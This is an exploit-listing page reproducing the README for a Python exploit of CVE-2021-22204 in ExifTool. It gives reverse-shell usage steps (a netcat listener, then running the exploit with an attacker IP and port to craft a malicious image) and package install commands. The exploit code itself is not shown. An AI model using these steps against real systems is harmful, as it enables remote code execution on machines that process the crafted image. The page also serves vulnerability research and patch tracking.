Exploit for Injection in Fedoraproject Fedora exploit

Share

## https://sploitus.com/exploit?id=4732718C-33AB-5303-8C25-8A0835A9464C # CVE-2021-22204-exiftool Python exploit for the CVE-2021-22204 vulnerability in Exiftool. #How to run: You can test the reverse shell with nc -nvlp 4444 Then: chmod +x exploit.py python3 exploit.py {Your IP add adress} {Your Listening port} OR ./exploit.py {Your IP add adress} {Your Listening port} #About the vulnerability The CVE-2021-22204 was discovered and reported by William Bowling. (@wcbowling) This exploit was made by studying the exiftool patch after the CVE was already reported. Pre-requisites @Requirements djvulibre-bin exiftool Install requirements Debian apt-get install djvulibre-bin libimage-exiftool-perl Ubuntu apt-get install djvulibre-bin libimage-exiftool-perl Arch Linux pacman -S djvulibre libimage-exiftool-perl Kali Linux apt-get install djvulibre-bin libimage-exiftool-perl Fedora dnf install djvulibre libimage-exiftool-perl OS X brew install djvulibre exiftool Raspbian apt-get install djvulibre-bin libimage-exiftool-perl And the image.jpg will trigger the vulnerability when opened with a vulnerable exiftool. Installed exiftool and djvulibre tools. If you are on Debian or ubuntu you can install with: